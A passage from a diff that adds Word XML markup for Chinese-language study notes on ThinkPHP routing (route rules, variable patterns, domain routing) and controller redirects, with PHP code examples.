+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>路由规则</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>1'=&gt;'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>路由地址和参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="250" w:left="525"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>路由规则</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>2'=&gt;['</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>路由地址和参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>匹配参数（数组）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>变量规则（数组）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>']</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="300" w:firstLine="630"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>...</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="250" w:firstLine="525"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>],'','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>请求类型</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>匹配参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>（数组）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>变量规则</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）路由配置文件：</w:t>
+            </w:r>
+            <w:r>
+              <w:t>route.php</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'new/:id'   =&gt; 'New/read',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'blog/:id'   =&gt; ['Blog/update',['method' =&gt; 'post|put'], ['id' =&gt; '\d+']],</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>] ;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）直接指定操作方法：不去调用控制器类方法</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Route::get('hello/:name',function($name){ </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return 'Hello,'.$name;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>});</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>变量</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>规则</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：限定变量的类型</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）全局：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Route::pattern([</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">       'name'  =&gt;  '\w+', //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>字符串</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">       'id'    =&gt;  '\d+',  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>数字</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）局部：在配置路由规则时附带</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'blog/:id'   =&gt; ['Blog/update',['method' =&gt; 'post|put'], [</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'id' =&gt; '\d+']],</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>路由</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>匹配参数</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C24756C" wp14:editId="5F4690BE">
+                  <wp:extent cx="3952240" cy="2228850"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="6" name="图片 6"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId20"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="2228850"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>路由</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>地址格式</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E80F83C" wp14:editId="5D89C82D">
+                  <wp:extent cx="3952240" cy="1083945"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+                  <wp:docPr id="12" name="图片 12"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId21"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="1083945"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>域名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>路由</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：可以代替虚拟主机，不同域名指向不同的地址</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>C</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>onfig</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">.php:   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'url_domain_deploy' =&gt;  true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>R</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>oute.</w:t>
+            </w:r>
+            <w:r>
+              <w:t>php:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">       '__domain__'=&gt;[</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">           'blog'      =&gt; 'blog',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>泛域名规则建议在最后定义</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">           '*.user'    =&gt;  'user',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">            '*'         =&gt; 'book',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">      ],</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>下面是路由规则定义</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>控制器</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6439"/>
+        <w:gridCol w:w="6440"/>
+        <w:gridCol w:w="6440"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>内</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>跳转和重定向</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>use \think\Controller;  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>使用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>success</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>或</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>error</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>跳转都需要继承</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>controller</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>类</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">class Index </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>extends \think\Controller</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>必须</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>继承</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>controller</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>类</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>public function hello($name){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">       </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>//return $this-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>success</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>($name.",</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>你找到我了</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>","shidandan");//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>跳转</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>或</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>error</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
